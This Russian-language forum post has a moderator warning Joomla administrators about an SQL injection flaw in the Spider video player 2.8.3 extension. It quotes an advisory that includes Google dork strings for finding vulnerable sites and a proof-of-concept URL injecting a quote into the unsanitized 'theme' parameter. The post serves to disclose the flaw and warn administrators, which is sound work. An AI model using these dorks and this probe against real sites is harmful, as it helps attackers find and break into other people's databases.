Как создать и настроить свой веб-сервер на VDS (05 сен 2024)

Осенью самое время заняться установкой и тюнингом своего веб-сервера. Не правда ли?

Joomla Spider 2.8.3 SQL Injection

serge
Автор темы
Не в сети
Модератор

Больше

10 года 3 мес. назад #1 от serge

serge создал тему: Joomla Spider 2.8.3 SQL Injection

Вниманию web-админов, использующих популярный Joomla Spider! версия 2.8.3 содержит уязвимость, уровень которой хотя и обозначен как medium, но все равно ничего хорошего. Описание эксплойта:

Code:

######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
inurl:option=com_spidervideoplayer

# Date : 2014-08-26

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'

"theme" variable is not sanitized.
#####################

Discovered By : Claudio Viviani

#####################

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Работает на Kunena форум